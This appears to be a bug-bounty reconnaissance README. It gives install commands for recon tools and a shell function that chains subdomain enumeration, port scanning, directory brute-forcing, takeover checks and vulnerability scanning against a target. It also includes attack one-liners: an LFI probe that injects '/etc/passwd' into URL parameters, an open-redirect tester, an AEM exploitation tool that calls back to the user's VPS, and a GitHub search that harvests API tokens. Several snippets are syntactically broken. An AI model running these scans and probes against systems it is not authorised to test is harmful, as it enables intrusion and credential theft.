
Simple recon using multiple tools!


Simple recon using multiple tools!


If you have Go installed and configured (i.e. with $GOPATH/bin in your $PATH):

Install Assetfinder

▶ go get -u github.com/tomnomnom/assetfinder

Install anew

▶ go get -u github.com/tomnomnom/anew

Install Amass

If you have brew installed if not /bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"

▶ brew install amass

Install Subfinder

▶ go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest

Install httpx

▶ go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest

Install Aquatone

  • Download the latest release of Aquatone for your operating system.
  • Uncompress the zip file and move the aquatone binary to your desired location. You probably want to move it to a location in your $PATH for easier use.

Install Naabu

▶ go install -v github.com/projectdiscovery/naabu/v2/cmd/naabu@latest

Install Subjack

▶ go get github.com/haccer/subjack

Install Nuclei

▶ go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest

Install Jaeles

If you have a Go environment, make sure you have Go >= 1.13 with Go Modules enable and run the following command.

▶ GO111MODULE=on go get github.com/jaeles-project/jaeles

Install ffuf

▶ go get -u github.com/ffuf/ffuf You can use dirsearch as well.

▶ pip3 install dirsearch

Download the wordlist ▶ wget "https://raw.githubusercontent.com/hackerspider1/Recon-bugbounty/main/dir.txt"


Add the following in your .zshrc

        mkdir $1
        subfinder -silent -d "$1" -o domains | httpx -silent -o hosts.txt
	osascript \
        -e 'tell application "iTerm2" to tell current window to set newWindow to (create tab with default profile)'\
        -e 'tell application "iTerm2" to tell current session of newWindow to write text "cd '`pwd`' && dirsearch -l hosts.txt -t 20 -x 500 -e asp,aspx,htm,html,gz,tgz,zip,txt,php,pl,tar,action,do --excl\ude-status=301,400,403,500-999"'\
        -e 'tell application "iTerm2" to tell current window to set newWindow to (create tab with default profile)'\
        -e 'tell application "iTerm2" to tell current session of newWindow to write text "echo '$1' | git-hound"'
        -e 'tell application "iTerm2" to tell current window to set newWindow to (create tab with default profile)'\
        -e 'tell application "iTerm2" to tell current session of newWindow to write text "kr scan '$1' -A=apiroutes-210228:20000 -x 10 --ignore-length=34x"'
	-e 'tell application "iTerm2" to tell current window to set newWindow to (create tab with default profile)'\
        -e 'tell application "iTerm2" to tell current session of newWindow to write text "cd '`pwd`' && jaeles scan -s ~/.jaeles/ -U hosts.txt 
        cat domains.txt | aquatone -out screens -scan-timeout 200 -screenshot-timeout 60000 -ports xlarge
        naabu -silent -iL domains.txt > portscan.txt
        subjack -w domains.txt -t 100 -timeout 20 -o subjack_out.txt --ssl -c ~/fingerprints.json
	nuclei -l hosts.txt -t ~/nuclei-templates/ -markdown-export reports
	code reports/
	#for i in $(cat hosts.txt); do ffuf -u $i/FUZZ -w ~/Documents/bugbounty/wordlist/dir.txt -ac -c -e php,txt,asp,html,aspx; done

Install Git-hound

  • Download the latest release of GitHound
  • Create a ./config.yml or ~/.githound/config.yml with your GitHub username and password. Optionally, include your 2FA OTP seed. See config.example.yml.
  • If it's your first time using the account on the system, you may receieve an account verification email.

Install Kiterunner

You can download a pre-built copy from (https://github.com/assetnote/kiterunner/releases).


git clone https://github.com/0ang3el/aem-hacker.git
cd aem-hacker
python3 aem_hacker.py -u https://aem.webapp --host your_vps_hostname_ip

Add it to .zshrc

aemhack (){ python3 ~/aem-directory/aem-hacker/aem_hacker.py -u $1 --host $2 }



lfi () {
gau $1 | gf lfi | qsreplace "/etc/passwd" | xargs -I % -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"'


open-redirect () {
local LHOST="http://localhost"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"'


echo "$1" | git-hound --dig-files --dig-commits --many-results --regex-file key.txt --results-only > api_tokens.txt"


We use tools which are developed by the following people

OWASP, ProjectDiscovery, Tom Hudson, Tillson Galloway, 0ang3el, Michael Henriksen, Jaeles Project, Lalit

Let me know one-liner owner would like to give credit!!

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